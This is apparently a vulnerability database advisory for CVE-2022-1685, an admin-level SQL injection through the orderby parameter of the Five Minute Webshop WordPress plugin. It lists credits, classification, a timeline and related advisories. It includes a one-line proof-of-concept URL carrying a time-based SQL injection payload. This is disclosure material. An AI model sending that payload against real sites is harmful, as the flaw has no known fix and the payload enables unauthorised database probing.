WordPress Plugin Vulnerabilities

Five Minute Webshop <= 1.3.2 - Admin+ SQLi via orderby

Description

The plugin does not properly validate and sanitise the orderby parameter before using it in a SQL statement via the Manage Products admin page, leading to an SQL Injection

Proof of Concept

https://example.com/wp-admin/admin.php?page=fmwes_products&orderby=id+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)

Affects Plugins

Plugin icon
five-minute-webshop
No known fix

References

CVE
CVE-2022-1685
URL
https://bulletin.iese.de/post/five-minute-webshop_1-3-2_1

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
86bd28d5-6767-4bca-ab59-710c1c4ecd97

Timeline

Publicly Published
2022-05-11 (about 2 years ago)
Added
2022-05-12 (about 2 years ago)
Last Updated
2022-05-13 (about 1 years ago)

Other

Published
Title
Published
2018-05-27
Title
wpForo Forum < 1.4.11 - Unauthenticated SQL Injection
Published
2023-12-21
Title
Pre* Party Resource Hints < 1.8.20 - Admin+ SQLi
Published
2014-08-01
Title
Mukioplayer 1.6 - SQL Injection
Published
2014-08-01
Title
Automatic 2.0.3 - csv.php q Parameter SQL Injection
Published
2022-05-23
Title
KiviCare < 2.3.9 - Unauthenticated SQLi